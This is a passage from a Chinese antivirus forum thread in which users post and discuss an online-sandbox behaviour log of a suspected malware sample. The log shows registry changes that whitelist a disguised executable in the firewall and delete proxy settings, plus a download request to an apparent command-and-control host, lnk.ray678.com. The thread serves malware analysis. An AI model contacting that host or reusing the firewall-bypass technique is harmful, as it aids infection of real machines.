netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\LogSessionName ["stdout"]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\Active [0x1]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\ControlFlags [0x1]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier\Guid ["b0278a28-76f1-4e15-b1df-14b209a12613"]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier\BitNames [" Error Unusual Info Debug"]
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [58 04 75 F3 E1 6F ED 90 ...]
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [ED 26 31 42 D4 66 B0 D1 ...]
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [27 DF 32 50 EB 91 D0 C9 ...]
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [8B 30 DB 05 AB 01 9C 16 ...]
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [6F B2 DF 64 50 AB FC 5E ...]
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [1B 7E CC EB 84 0A 72 34 ...]
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [81 D2 35 18 F0 D0 99 75 ...]
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [E1 E0 B9 DF F5 FF 42 7E ...]
netsh.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files\RealAudo\Ac97\GooglePinying.exe ["C:\Program Files\RealAudo\Ac97\GooglePinying.exe:*:Enabled:StacSV"]
svchost.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch [0x7A]

Delete value key:
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
wmiprvse.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PerfOS\Performance\Error Count

Download file:
Get lnk.ray678.com:8664
/lltj/cfg1FileServlet?g=5d28beaea0fd951cd3ebd72549215a9a&m=5d28beaea0fd951cd3ebd72549215a9a&p1=data01&p2=P2LOST&p3=P3LOST&ver=1.0.2.1&now=2012-06-20%2013:46:35&s=7fba36a4106a19dd555199d4e6c4c559

Try to connect domain:
lnk.ray678.com
cfans
发表于 2012-6-20 14:01:27 | 显示全部楼层
jayavira 发表于 2012-6-20 13:52
.__  ___.                  
   _____  _____   |  | \_ |__    ____ ___  ___
/   ...

这个是用什么分析的?
cfans
发表于 2012-6-20 14:03:27 | 显示全部楼层
/tiao眼镜鱼 发表于 2012-6-20 13:45
你有火眼邀请码??怎么得到的???

山山论坛攻防区 参加活动就可以免费得邀请码,

昨天还搞活动来着
jayavira
发表于 2012-6-20 14:21:14 | 显示全部楼层
cfans 发表于 2012-6-20 14:01
这个是用什么分析的?

在线沙盘
wuyongliang
头像被屏蔽
发表于 2012-6-20 16:02:46 | 显示全部楼层
本帖最后由 wuyongliang 于 2012-6-20 16:04 编辑
cfans 发表于 2012-6-20 13:20
请看了文件 再说 不要妄下结论。


哦 看看下载 FS A2都没报
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-26 08:20 , Processed in 0.098345 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表